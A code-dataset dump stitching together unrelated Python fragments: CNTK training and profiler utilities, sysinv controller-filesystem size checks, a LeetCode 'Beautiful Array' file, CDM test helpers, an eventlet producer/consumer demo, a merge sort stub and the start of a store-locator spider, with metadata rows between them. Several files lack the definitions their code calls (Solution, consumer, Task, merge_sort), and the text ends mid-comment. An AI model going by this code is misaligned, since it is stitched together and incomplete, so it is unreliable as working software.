return copy.copy(trainer.previous_minibatch_loss_average)
def get_train_eval_criterion(trainer):
'''
Fetch the train evaluation criterion (e.g., classification error) from the last minibatch and copy it to the CPU in case it is on the GPU.
Args:
trainer (:class:`Trainer`): the trainer used.
Returns:
the criterion value
'''
# we copy the value so swig does not destroy it when we leave the scope
return copy.copy(trainer.previous_minibatch_evaluation_average)
# Obsolete: All usages should be replaced with the variable_value_to_seq
# procedure below
def value_to_seq(value):
'''
Convert a Value to a sequence of NumPy arrays that have their masked
entries removed.
Args:
value (:class:`~cntk.core.Value`): Value as it is returned by Swig
Returns:
a list of NumPy arrays
'''
np_data = np.asarray(value)
mask = value.mask()
if mask:
mask = np.asarray(mask)
np_data = [seq[mask[idx] != cntk_py.MaskKind_Invalid]
for idx, seq in enumerate(np_data)]
return np_data
def variable_value_to_seq(value, variable):
'''
Convert a Value to a sequence of NumPy arrays that have their masked
entries removed.
Args:
value (:class:`~cntk.core.Value`): Value as it is returned by Swig
Returns:
a list of NumPy arrays
'''
mask = value.mask()
if mask:
value_sequences = value.unpack_variable_value(variable, True, cpu())
return [np.asarray(seq) for seq in value_sequences[0]]
else:
return np.asarray(value)
def eval(op, arguments=None, precision=None, device=None, backward_pass=False, expected_backward=None):
    '''
    It evaluates ``op`` on the data provided by the reader. This is useful
    mainly to explore the operators and for convenient unit testing.

    Args:
        op (:class:`Function`): operation to evaluate
        arguments: maps variables to their input data. The
            interpretation depends on the input type:
            * `dict`: keys are input variable or names, and values are the input data.
            * any other type: if node has a unique input, ``arguments`` is mapped to this input.
            For nodes with more than one input, only `dict` is allowed.
            In both cases, every sample in the data will be interpreted
            as a new sequence. To mark samples as continuations of the
            previous sequence, specify ``arguments`` as `tuple`: the
            first element will be used as ``arguments``, and the second one will
            be used as a list of bools, denoting whether a sequence is a new
            one (`True`) or a continuation of the previous one (`False`).
            Data should be either NumPy arrays or a
            :class:`~cntk.io.MinibatchData` instance.
        seq_starts (list of bools or None): if None, every sequence is
            treated as a new sequence. Otherwise, it is interpreted as a list of
            Booleans that tell whether a sequence is a new sequence (`True`) or a
            continuation of the sequence in the same slot of the previous
            minibatch (`False`).
            NOTE(review): this is not an actual parameter of this function;
            pass it via the tuple form of ``arguments`` described above.
        precision (str or None): precision being 'float32', 'float64', or
            None, in which case it will be determined by inspecting the operator
            (costly)
        device (:class:`~cntk.device.DeviceDescriptor`, default None): device
            this value should be put on
        backward_pass (`bool`, optional): whether a backward pass is performed
        expected_backward (`dict` or None): keys are variables for which to
            compute a backward output. By default (None) all entries from
            'arguments' are used

    Returns:
        a tuple ``(forward_output, backward_output)``; ``forward_output`` maps
        output variables to their values, and ``backward_output`` maps
        variables to their gradients, or is None when ``backward_pass`` is
        False.
    '''
    if backward_pass:
        # Keep the forward state so it can be fed back into op.backward().
        state, forward_output = op.forward(arguments, op.outputs, op.outputs,
                                           device=device)
        if expected_backward is None:
            expected_backward = arguments
        # Seed the backward pass with all-ones root gradients, one per output.
        root_gradients = {v: _ones_like(o, precision) for v, o in
                          forward_output.items()}
        backward_output = op.backward(state, root_gradients, expected_backward)
        return forward_output, backward_output
    else:
        state, forward_output = op.forward(
            arguments, op.outputs, None, device=device)
        return forward_output, None
def get_python_function_arguments(f):
    '''
    Helper to get the parameter names and annotations of a Python function.

    Args:
        f: the function to inspect

    Returns:
        a tuple ``(arg_names, annotations)`` where ``arg_names`` lists only
        the non-optional parameter names and ``annotations`` maps parameter
        names to their annotations.
    '''
    # Note that we only return non-optional arguments (we assume that any optional args are not specified).
    # This allows to, e.g., accept max(a, b, *more, name='') as a binary function
    import sys
    # BUGFIX: the inspection code below was previously nested inside the
    # Python-2 'else:' branch, so on Python 3 'param_specs' was never assigned
    # (NameError) and on Python 2 'getfullargspec' was never imported.
    if sys.version_info.major >= 3:
        from inspect import getfullargspec
        param_specs = getfullargspec(f)
        annotations = param_specs.annotations
    else:
        # Python 2 has no getfullargspec and its arg spec carries no
        # annotations; fall back to getargspec plus the function's
        # __annotations__ attribute (as set e.g. by the @Signature decorator).
        from inspect import getargspec
        param_specs = getargspec(f)
        annotations = getattr(f, '__annotations__', {})
    arg_names = param_specs.args
    defaults = param_specs.defaults  # "if this tuple has n elements, they correspond to the last n elements listed in args"
    if defaults:
        # We allow Function(functions with default arguments), but those args will
        # always have default values since CNTK Functions do not support this.
        arg_names = arg_names[:-len(defaults)]
    return (arg_names, annotations)
def map_function_arguments(params, params_dict, *args, **kwargs):
    '''
    Helper to determine the argument map for use with various call operations.
    Returns a dictionary from parameters to whatever arguments are passed.
    Accepted are both positional and keyword arguments.
    This mimics Python's argument interpretation, except that keyword arguments are not optional.
    This does not require the arguments to be Variables or Functions. It is also called by train_minibatch() and @Signature.
    '''
    # Positional arguments bind to parameters in declaration order.
    arg_map = dict(zip(params, args))
    # Keyword arguments bind by name, resolved through the params_dict table.
    for kw_name, kw_value in kwargs.items():
        if kw_name not in params_dict:
            raise TypeError("got an unexpected keyword argument '%s'" % kw_name)
        param = params_dict[kw_name]
        if param in arg_map:
            raise SyntaxError("got multiple values for argument '%s'" % kw_name)
        arg_map[param] = kw_value
    # Every parameter must have received exactly one argument.
    assert len(arg_map) == len(params)
    return arg_map
def Signature(*args, **kwargs):
    '''
    ``@Signature`` is a decorator to implement the function-argument annotations in Python-2.7,
    as needed by the ``@Function`` decorator.
    This is only needed when you have not yet migrated to Python 3.x.

    Note: Although this is aimed at enabling ``@Function`` syntax with type annotations
    in Python 2.7, ``@Signature`` is independent of CNTK and can be used for any argument annotation.

    Args:
        *args: types of arguments of the function that this decorator is applied to, in the same order.
        **kwargs: types of arguments with optional names, e.g. `x=Tensor[42]`. Use this second form for
           longer argument lists.

    Example::

     # Python 3:
     @Function
     def f(x: Tensor[42]):
         return sigmoid(x)

     # Python 2.7:
     @Function
     @Signature(Tensor[42])
     def f(x):
         return sigmoid(x)

     # note that this:
     @Signature(x=int)
     def sqr(x):
         return x*x
     # is identical to:
     def sqr(x):
         return x*x
     sqr.__annotations__ = {'x': int}
    '''
    # BUGFIX: 'add_annotations' was referenced but never defined in this
    # block, so applying the decorator raised NameError at runtime.
    def add_annotations(f):
        # Determine the decorated function's parameter names.
        try:
            from inspect import getfullargspec
            param_names = getfullargspec(f).args
        except ImportError:  # Python 2.7
            from inspect import getargspec
            param_names = getargspec(f).args
        if len(args) + len(kwargs) != len(param_names):
            raise TypeError("Signature: %d annotations given, but the "
                            "function has %d parameters" %
                            (len(args) + len(kwargs), len(param_names)))
        # Positional annotations map to the leading parameters, in order.
        annotations = dict(zip(param_names, args))
        # Keyword annotations map to parameters by name.
        for name, annotation in kwargs.items():
            if name not in param_names:
                raise TypeError("got an unexpected keyword argument '%s'" % name)
            if name in annotations:
                raise SyntaxError("got multiple annotations for argument '%s'" % name)
            annotations[name] = annotation
        f.__annotations__ = annotations
        return f
    # this function returns another function which is the actual decorator applied to the def:
    return add_annotations
def start_profiler(dir='profiler', sync_gpu=True, reserve_mem=cntk_py.default_profiler_buffer_size):
    '''
    Start profiler to prepare performance statistics gathering. Note that
    the profiler is not enabled after start
    (`example
    <https://github.com/Microsoft/CNTK/wiki/Performance-Profiler#for-python>`_).

    Args:
        dir: directory for profiler output
        sync_gpu: whether profiler syncs CPU with GPU when timing
        reserve_mem: size in byte for profiler memory reserved
    '''
    # Thin wrapper over the SWIG-generated binding; call enable_profiler()
    # afterwards to actually begin collecting data.
    cntk_py.start_profiler(dir, sync_gpu, reserve_mem)
def stop_profiler():
    '''
    Stop profiler from gathering performance statistics and flush them to file
    '''
    # Thin wrapper over the SWIG-generated binding.
    cntk_py.stop_profiler()
def enable_profiler():
    '''
    Enable profiler to gather data. Note that in training_session, profiler would be enabled automatically after the first check point
    '''
    # Thin wrapper over the SWIG-generated binding; requires start_profiler()
    # to have been called first.
    cntk_py.enable_profiler()
def disable_profiler():
    '''
    Disable profiler from gathering data.
    '''
    # Thin wrapper over the SWIG-generated binding.
    cntk_py.disable_profiler()
| 35.528868 | 189 | 0.651586 |
54b9d0d77aa935ba65cfcd82b3fdde8db5a12f2f | 1,457 | py | Python | data/data_utils.py | ivankreso/LDN | 76740ef77fcec851f8abc2380251a9491dc0cdc3 | [
"MIT"
] | 8 | 2020-03-28T15:42:39.000Z | 2021-07-26T17:40:59.000Z | data/data_utils.py | ivankreso/LDN | 76740ef77fcec851f8abc2380251a9491dc0cdc3 | [
"MIT"
] | 1 | 2021-08-19T08:52:19.000Z | 2021-08-19T08:52:19.000Z | data/data_utils.py | ivankreso/LDN | 76740ef77fcec851f8abc2380251a9491dc0cdc3 | [
"MIT"
] | 1 | 2021-12-06T08:05:59.000Z | 2021-12-06T08:05:59.000Z | import math
| 30.354167 | 90 | 0.680165 |
54bbf057df21a564d7a670875ca4d351e87df738 | 1,181 | py | Python | src/leetcode_932_beautiful_array.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | src/leetcode_932_beautiful_array.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | src/leetcode_932_beautiful_array.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | # @l2g 932 python3
# [932] Beautiful Array
# Difficulty: Medium
# https://leetcode.com/problems/beautiful-array
#
# An array nums of length n is beautiful if:
#
# nums is a permutation of the integers in the range [1, n].
# For every 0 <= i < j < n, there is no index k with i < k < j where 2 * nums[k] == nums[i] + nums[j].
#
# Given the integer n,return any beautiful array nums of length n.
# There will be at least one valid answer for the given n.
#
# Example 1:
# Input: n = 4
# Output: [2,1,4,3]
# Example 2:
# Input: n = 5
# Output: [3,1,2,5,4]
#
#
# Constraints:
#
# 1 <= n <= 1000
#
#
from typing import List
if __name__ == "__main__":
    import os
    import pytest
    # Run this problem's unit tests when the module is executed directly.
    # NOTE(review): the Solution implementation is not present in this chunk;
    # it is expected to live earlier in the file.
    pytest.main([os.path.join("tests", "test_932.py")])
| 21.87037 | 102 | 0.556308 |
54bc320185cf4b126b5fbdb33a31e831a7364c2c | 1,209 | py | Python | objectModel/Python/tests/cdm/cdm_collection/cdm_collection_helper_functions.py | aaron-emde/CDM | 9472e9c7694821ac4a9bbe608557d2e65aabc73e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | objectModel/Python/tests/cdm/cdm_collection/cdm_collection_helper_functions.py | aaron-emde/CDM | 9472e9c7694821ac4a9bbe608557d2e65aabc73e | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-05-11T23:57:12.000Z | 2021-08-04T05:03:05.000Z | objectModel/Python/tests/cdm/cdm_collection/cdm_collection_helper_functions.py | aaron-emde/CDM | 9472e9c7694821ac4a9bbe608557d2e65aabc73e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | from cdm.objectmodel import CdmCorpusDefinition, CdmManifestDefinition
from cdm.storage import LocalAdapter
from cdm.enums import CdmObjectType
def generate_manifest(local_root_path: str) -> 'CdmManifestDefinition':
    """
    Create the manifest used by the tests, backed by a corpus whose
    'local' and 'cdm' namespaces both point at *local_root_path*.
    """
    corpus = CdmCorpusDefinition()
    corpus.storage.default_namespace = 'local'
    local_adapter = LocalAdapter(root=local_root_path)
    # The same adapter serves both the 'local' and the 'cdm' namespace.
    for namespace in ('local', 'cdm'):
        corpus.storage.mount(namespace, local_adapter)
    manifest = CdmManifestDefinition(corpus.ctx, 'manifest')
    manifest.folder_path = '/'
    manifest.namespace = 'local'
    return manifest
def create_document_for_entity(cdm_corpus: 'CdmCorpusDefinition', entity: 'CdmEntityDefinition', nameSpace: str = 'local'):
    """
    Create a document named '<entity_name>.cdm.json' in the root folder of
    the given namespace, place the entity inside it, and return the document.
    """
    root_folder = cdm_corpus.storage.fetch_root_folder(nameSpace)
    document_name = '{}.cdm.json'.format(entity.entity_name)
    entity_doc = cdm_corpus.ctx.corpus.make_object(CdmObjectType.DOCUMENT_DEF, document_name, False)
    root_folder.documents.append(entity_doc)
    entity_doc.definitions.append(entity)
    return entity_doc
| 35.558824 | 127 | 0.746071 |
54bc883a34e91f4283ceaf8207e99c37307465c6 | 894 | py | Python | asynchronous/py27/asynchronous/producer_consumer/async_eventlet.py | fs714/concurrency-example | fbff041804b9c46fb7f21ebbae22acff745c7b0c | [
"Apache-2.0"
] | null | null | null | asynchronous/py27/asynchronous/producer_consumer/async_eventlet.py | fs714/concurrency-example | fbff041804b9c46fb7f21ebbae22acff745c7b0c | [
"Apache-2.0"
] | null | null | null | asynchronous/py27/asynchronous/producer_consumer/async_eventlet.py | fs714/concurrency-example | fbff041804b9c46fb7f21ebbae22acff745c7b0c | [
"Apache-2.0"
] | 1 | 2020-03-10T15:47:05.000Z | 2020-03-10T15:47:05.000Z | import eventlet
from eventlet.green import urllib2
import logging
logging.basicConfig()
logger = logging.getLogger(__file__)
logger.setLevel(logging.DEBUG)
if __name__ == '__main__':
    # Producer/consumer demo: hit the local URL 100 times via 10 green
    # threads pulling from a shared queue.
    url = 'http://127.0.0.1/1'
    num_consumers = 10
    num_tasks = 100
    task_queue = eventlet.Queue()
    pool = eventlet.GreenPool()
    # Spawn the consumers first so they drain the queue while it fills.
    # NOTE(review): `consumer` and `Task` are not defined in this chunk;
    # they are expected to come from elsewhere in the file.
    for i in xrange(num_consumers):
        pool.spawn(consumer, task_queue)
    for i in xrange(num_tasks):
        task_queue.put(Task(url))
        logger.info('async_call finish loop ' + str(i))
    # Block until every queued task has been marked done by a consumer.
    task_queue.join()
| 21.285714 | 55 | 0.644295 |
54bcc1399279abf79ea8c42b52f38e4ad74979ae | 1,155 | py | Python | models.py | zhangjingqiang/qiang-tools | 73fcb896bfec14f1ed668a1ef81526d80c80082f | [
"MIT"
] | null | null | null | models.py | zhangjingqiang/qiang-tools | 73fcb896bfec14f1ed668a1ef81526d80c80082f | [
"MIT"
] | null | null | null | models.py | zhangjingqiang/qiang-tools | 73fcb896bfec14f1ed668a1ef81526d80c80082f | [
"MIT"
] | null | null | null | from flask.ext.login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from app import db
class Tool(db.Model):
    """
    Tools details.
    """
    # SQLAlchemy model mapped to the 'tools' table.
    __tablename__ = 'tools'
    # Surrogate integer primary key.
    id = db.Column(db.Integer, primary_key=True)
    # Tool name (length-unconstrained string column).
    name = db.Column(db.String())
54bd473259faa4301d10d34795bb5bf05e6048e5 | 32,426 | py | Python | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/controller_fs.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/controller_fs.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/controller_fs.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 UnitedStack Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2013-2018 Wind River Systems, Inc.
#
import jsonpatch
import pecan
from pecan import rest
import wsme
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from sysinv.api.controllers.v1 import base
from sysinv.api.controllers.v1 import collection
from sysinv.api.controllers.v1 import link
from sysinv.api.controllers.v1 import types
from sysinv.api.controllers.v1 import utils
from sysinv.common import constants
from sysinv.common import exception
from sysinv.common import health
from sysinv.common import utils as cutils
from sysinv import objects
from sysinv.openstack.common import log
from sysinv.openstack.common.gettextutils import _
from fm_api import constants as fm_constants
from sysinv.common.storage_backend_conf import StorageBackendConfig
LOG = log.getLogger(__name__)
def _total_size_controller_multi_fs(controller_fs_new_list):
    """Sum the sizes of the given controller filesystems.

    The database filesystem is accounted for at twice its nominal size
    (presumably to cover its replica -- confirm). This is called to verify
    file system capability on a controller with the primary (initial)
    storage backend already configured; calling from initial config
    (config_controller stage) will result in failure.
    """
    total_size = 0
    for fs in controller_fs_new_list:
        multiplier = 2 if fs.name == constants.FILESYSTEM_NAME_DATABASE else 1
        total_size += multiplier * fs.size
    return total_size
def _total_size_controller_fs(controller_fs_new, controller_fs_list):
    """Sum the sizes of the listed controller filesystems, substituting
    the size from ``controller_fs_new`` for the matching entry (if given).

    The database filesystem is accounted for at twice its nominal size.
    This is called to verify file system capability on a controller with
    the primary (initial) storage backend already configured; calling from
    initial config (config_controller stage) will result in failure.
    """
    override_name = controller_fs_new['name'] if controller_fs_new else None
    total_size = 0
    for fs in controller_fs_list:
        if override_name is not None and fs['name'] == override_name:
            size = controller_fs_new['size']
        else:
            size = fs['size']
        if fs['name'] == "database":
            size *= 2
        total_size += size
    LOG.info(
        "_total_size_controller_fs total filesysem size %s" % total_size)
    return total_size
def _check_relative_controller_multi_fs(controller_fs_new_list):
    """
    This function verifies the relative controller_fs sizes.

    The backup filesystem must be at least as large as the glance (cgcs)
    plus database filesystems plus a fixed overhead.

    :param controller_fs_new_list: list of controller filesystem objects,
        expected to contain the database, cgcs and backup entries.
    :return: None. Raise Client exception on failure.
    """
    if cutils.is_virtual():
        return
    backup_gib_min = constants.BACKUP_OVERHEAD
    # BUGFIX: initialize all accumulators so a list that is missing one of
    # the entries no longer raises UnboundLocalError below; a missing backup
    # entry skips the check, mirroring _check_relative_controller_fs.
    backup_gib = None
    cgcs_gib = 0
    database_gib = 0
    for fs in controller_fs_new_list:
        if fs.name == constants.FILESYSTEM_NAME_DATABASE:
            database_gib = fs.size
            backup_gib_min += fs.size
        elif fs.name == constants.FILESYSTEM_NAME_CGCS:
            cgcs_gib = fs.size
            backup_gib_min += fs.size
        elif fs.name == constants.FILESYSTEM_NAME_BACKUP:
            backup_gib = fs.size
    if backup_gib is None:
        # Backup filesystem not present in the list; nothing to verify yet.
        return
    if backup_gib < backup_gib_min:
        raise wsme.exc.ClientSideError(_("backup size of %d is "
                                         "insufficient. "
                                         "Minimum backup size of %d is "
                                         "required based upon glance size %d "
                                         "and database size %d. "
                                         "Rejecting modification "
                                         "request." %
                                         (backup_gib,
                                          backup_gib_min,
                                          cgcs_gib,
                                          database_gib
                                          )))
def _check_relative_controller_fs(controller_fs_new, controller_fs_list):
    """
    This function verifies the relative controller_fs sizes.

    The backup filesystem must be at least as large as the glance (cgcs)
    plus database filesystems plus a fixed overhead.

    :param controller_fs_new: dict with 'name' and 'size' of the filesystem
        being modified, or None
    :param controller_fs_list: list of filesystem dicts with 'name' and 'size'
    :return: None. Raise Client exception on failure.
    """
    if cutils.is_virtual():
        return
    backup_gib = 0
    database_gib = 0
    cgcs_gib = 0
    for fs in controller_fs_list:
        # NOTE(review): this mutates the caller's dict in place when the
        # entry matches controller_fs_new -- confirm callers expect that.
        if controller_fs_new and fs['name'] == controller_fs_new['name']:
            fs['size'] = controller_fs_new['size']
        if fs['name'] == "backup":
            backup_gib = fs['size']
        elif fs['name'] == constants.DRBD_CGCS:
            cgcs_gib = fs['size']
        elif fs['name'] == "database":
            database_gib = fs['size']
    if backup_gib == 0:
        # Backup filesystem not configured yet; skip the relative-size check.
        LOG.info(
            "_check_relative_controller_fs backup filesystem not yet setup")
        return
    # Required mininum backup filesystem size
    backup_gib_min = cgcs_gib + database_gib + constants.BACKUP_OVERHEAD
    if backup_gib < backup_gib_min:
        raise wsme.exc.ClientSideError(_("backup size of %d is "
                                         "insufficient. "
                                         "Minimum backup size of %d is "
                                         "required based on upon "
                                         "glance=%d and database=%d and "
                                         "backup overhead of %d. "
                                         "Rejecting modification "
                                         "request." %
                                         (backup_gib,
                                          backup_gib_min,
                                          cgcs_gib,
                                          database_gib,
                                          constants.BACKUP_OVERHEAD
                                          )))
def _check_controller_state():
    """
    Verify that every controller host is unlocked, enabled and available.

    A controller that is merely degraded by filesystem-usage alarms is still
    accepted, because the resize operation itself will clear that degrade.

    :return: True when all controllers pass the check.
    :raises wsme.exc.ClientSideError: when any controller is in a state that
        does not allow the operation.
    """
    chosts = pecan.request.dbapi.ihost_get_by_personality(
        constants.CONTROLLER)
    for chost in chosts:
        if (chost.administrative != constants.ADMIN_UNLOCKED or
                chost.availability != constants.AVAILABILITY_AVAILABLE or
                chost.operational != constants.OPERATIONAL_ENABLED):
            # A node can become degraded due to no free space available in a
            # FS and thus block the resize operation. If the only alarms that
            # degrade a controller node are filesystem alarms, we shouldn't
            # block the resize as the resize itself will clear the degrade.
            health_helper = health.Health(pecan.request.dbapi)
            degrade_alarms = health_helper.get_alarms_degrade(
                pecan.request.context,
                alarm_ignore_list=[fm_constants.FM_ALARM_ID_FS_USAGE],
                entity_instance_id_filter="controller-")
            allowed_resize = False
            if (not degrade_alarms and
                    chost.availability == constants.AVAILABILITY_DEGRADED):
                allowed_resize = True
            if not allowed_resize:
                alarm_explanation = ""
                if degrade_alarms:
                    alarm_explanation = "Check alarms with the following IDs: %s" % str(degrade_alarms)
                raise wsme.exc.ClientSideError(
                    _("This operation requires controllers to be %s, %s, %s. "
                      "Current status is %s, %s, %s. %s." %
                      (constants.ADMIN_UNLOCKED, constants.OPERATIONAL_ENABLED,
                       constants.AVAILABILITY_AVAILABLE,
                       chost.administrative, chost.operational,
                       chost.availability, alarm_explanation)))
    return True
def _get_controller_cgtsvg_limit():
    """Calculate the free space of the cgts-vg volume group across both
    controllers.

    returns: cgtsvg_max_free_GiB -- the free space (GiB) usable for
        controller filesystem growth: the minimum of the two controllers
        when both report free space, otherwise whichever one does.

    :raises wsme.exc.ClientSideError: when a controller still has
        unprovisioned cgts-vg physical volumes.
    """
    def _cgtsvg_free_mib(chost, label):
        # One-line purpose: report the free space (MiB) of cgts-vg on a
        # single controller host, rejecting hosts with unprovisioned PVs.
        # (Factored out of two near-identical controller-0/controller-1
        # branches.)
        ipvs = pecan.request.dbapi.ipv_get_by_ihost(chost.uuid)
        for ipv in ipvs:
            if (ipv.lvm_vg_name == constants.LVG_CGTS_VG and
                    ipv.pv_state != constants.PROVISIONED):
                # The %-interpolation happens before _() is called, so the
                # translated strings are identical to the original per-host
                # messages.
                msg = _("Cannot resize filesystem. There are still "
                        "unprovisioned physical volumes on %s." % label)
                raise wsme.exc.ClientSideError(msg)
        ilvgs = pecan.request.dbapi.ilvg_get_by_ihost(chost.uuid)
        for ilvg in ilvgs:
            if (ilvg.lvm_vg_name == constants.LVG_CGTS_VG and
                    ilvg.lvm_vg_size and ilvg.lvm_vg_total_pe):
                # free = total_size * free_pe / total_pe, converted to MiB.
                return (int(ilvg.lvm_vg_size) *
                        int(ilvg.lvm_vg_free_pe) / int(
                        ilvg.lvm_vg_total_pe)) / (1024 * 1024)
        return 0

    cgtsvg0_free_mib = 0
    cgtsvg1_free_mib = 0
    chosts = pecan.request.dbapi.ihost_get_by_personality(
        constants.CONTROLLER)
    for chost in chosts:
        if chost.hostname == constants.CONTROLLER_0_HOSTNAME:
            cgtsvg0_free_mib = _cgtsvg_free_mib(chost, 'controller-0')
        else:
            cgtsvg1_free_mib = _cgtsvg_free_mib(chost, 'controller-1')
    LOG.info("_get_controller_cgtsvg_limit cgtsvg0_free_mib=%s, "
             "cgtsvg1_free_mib=%s" % (cgtsvg0_free_mib, cgtsvg1_free_mib))
    if cgtsvg0_free_mib > 0 and cgtsvg1_free_mib > 0:
        cgtsvg_max_free_GiB = min(cgtsvg0_free_mib, cgtsvg1_free_mib) / 1024
        LOG.info("min of cgtsvg0_free_mib=%s and cgtsvg1_free_mib=%s is "
                 "cgtsvg_max_free_GiB=%s" %
                 (cgtsvg0_free_mib, cgtsvg1_free_mib, cgtsvg_max_free_GiB))
    elif cgtsvg1_free_mib > 0:
        cgtsvg_max_free_GiB = cgtsvg1_free_mib / 1024
    else:
        cgtsvg_max_free_GiB = cgtsvg0_free_mib / 1024
    LOG.info("SYS_I filesystem limits cgtsvg0_free_mib=%s, "
             "cgtsvg1_free_mib=%s, cgtsvg_max_free_GiB=%s"
             % (cgtsvg0_free_mib, cgtsvg1_free_mib, cgtsvg_max_free_GiB))
    return cgtsvg_max_free_GiB
def _check_controller_multi_fs_data(context, controller_fs_list_new,
                                    modified_fs):
    """ Check controller filesystem data and return growth

    Compares the requested filesystem sizes against the current logical
    volume sizes: shrinking below the current size is rejected, and the
    total required cgts-vg growth is accumulated (database counts double).

    returns: cgtsvg_growth_gib
    """
    cgtsvg_growth_gib = 0
    # Check if we need img_conversions
    img_conversion_required = False
    lvdisplay_keys = [constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_DATABASE],
                      constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_CGCS],
                      constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_BACKUP],
                      constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_SCRATCH],
                      constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_GNOCCHI]]
    # On primary region, img-conversions always exists in controller_fs DB table.
    # On secondary region, if both glance and cinder are sharing from the primary
    # region, img-conversions won't exist in controller_fs DB table. We already
    # have semantic check not to allow img-conversions resizing.
    if (StorageBackendConfig.has_backend(pecan.request.dbapi, constants.SB_TYPE_LVM) or
            StorageBackendConfig.has_backend(pecan.request.dbapi, constants.SB_TYPE_CEPH)):
        img_conversion_required = True
        lvdisplay_keys.append(constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_IMG_CONVERSIONS])
    if (constants.FILESYSTEM_NAME_IMG_CONVERSIONS in modified_fs and
            not img_conversion_required):
        raise wsme.exc.ClientSideError(
            _("%s is not modifiable: no cinder backend is "
              "currently configured.") % constants.FILESYSTEM_NAME_IMG_CONVERSIONS)
    lvdisplay_dict = pecan.request.rpcapi.get_controllerfs_lv_sizes(context)
    # Every tracked logical volume must report a current size.
    for key in lvdisplay_keys:
        if not lvdisplay_dict.get(key, None):
            raise wsme.exc.ClientSideError(_("Unable to determine the "
                                             "current size of %s. "
                                             "Rejecting modification "
                                             "request." % key))
    for fs in controller_fs_list_new:
        lv = fs.logical_volume
        if lvdisplay_dict.get(lv, None):
            orig = int(float(lvdisplay_dict[lv]))
            new = int(fs.size)
            # The database LV is provisioned at twice the requested size,
            # so halve the reported size before comparing.
            if fs.name == constants.FILESYSTEM_NAME_DATABASE:
                orig = orig / 2
            if orig > new:
                raise wsme.exc.ClientSideError(_("'%s' must be at least: "
                                                 "%s" % (fs.name, orig)))
            if fs.name == constants.FILESYSTEM_NAME_DATABASE:
                cgtsvg_growth_gib += 2 * (new - orig)
            else:
                cgtsvg_growth_gib += (new - orig)
    LOG.info("_check_controller_multi_fs_data cgtsvg_growth_gib=%s" %
             cgtsvg_growth_gib)
    return cgtsvg_growth_gib
# Lock name for ControllerFs API operations (presumably consumed by a
# synchronized/lock decorator elsewhere in the file -- confirm).
LOCK_NAME = 'ControllerFsController'
| 40.481898 | 104 | 0.587923 |
54bd765684733907c0e0f4fdff1bc9c5e51272ef | 1,298 | py | Python | tests/test_label_smoothing_ce.py | waking95/easy-bert | 576678343c251a134748941d1aa5e3368786337e | [
"MIT"
] | 12 | 2021-12-15T06:08:28.000Z | 2022-03-25T06:27:38.000Z | tests/test_label_smoothing_ce.py | waking95/easy-bert | 576678343c251a134748941d1aa5e3368786337e | [
"MIT"
] | null | null | null | tests/test_label_smoothing_ce.py | waking95/easy-bert | 576678343c251a134748941d1aa5e3368786337e | [
"MIT"
] | 1 | 2022-02-10T02:59:51.000Z | 2022-02-10T02:59:51.000Z | import unittest
import torch
from easy_bert.losses.label_smoothing_loss import LabelSmoothingCrossEntropy
if __name__ == '__main__':
    # Discover and run the unittest test cases defined in this module.
    unittest.main()
| 36.055556 | 101 | 0.523112 |
54be3891db6fb2756f21aef061add0f576fa4d9b | 747 | py | Python | Algorithms/Sort/Merge Sort/src.py | NikhilCodes/DSA-Warehouse | f68c3c7c092dc624381e956b065f849d738b5359 | [
"MIT"
] | null | null | null | Algorithms/Sort/Merge Sort/src.py | NikhilCodes/DSA-Warehouse | f68c3c7c092dc624381e956b065f849d738b5359 | [
"MIT"
] | null | null | null | Algorithms/Sort/Merge Sort/src.py | NikhilCodes/DSA-Warehouse | f68c3c7c092dc624381e956b065f849d738b5359 | [
"MIT"
] | null | null | null | """
ALGORITHM : Merge Sort
WORST CASE => {
PERFORMANCE: O(n log(n))
SPACE: O(n)
}
"""
if __name__ == '__main__':
    # Smoke-test the sort on a small sample and print the result.
    # NOTE(review): merge_sort is not defined in this chunk; it is expected
    # to be defined earlier in the file.
    sorted_arr = merge_sort([8, 4, 2, 9, 1, 3])
    print(sorted_arr)
| 20.189189 | 48 | 0.497992 |
54bf36b4e97ce13f93c4eda7288e2207a9d1c577 | 2,295 | py | Python | locations/spiders/dollarama.py | cmecklenborg/alltheplaces | e62b59fb0071b6e289c4622d368fdb203a28347e | [
"MIT"
] | null | null | null | locations/spiders/dollarama.py | cmecklenborg/alltheplaces | e62b59fb0071b6e289c4622d368fdb203a28347e | [
"MIT"
] | null | null | null | locations/spiders/dollarama.py | cmecklenborg/alltheplaces | e62b59fb0071b6e289c4622d368fdb203a28347e | [
"MIT"
] | null | null | null | import scrapy
from locations.items import GeojsonPointItem
from urllib.parse import urlencode
from scrapy.selector import Selector
from locations.hours import OpeningHours
# Day-of-week abbreviations, Sunday-first (presumably consumed by the
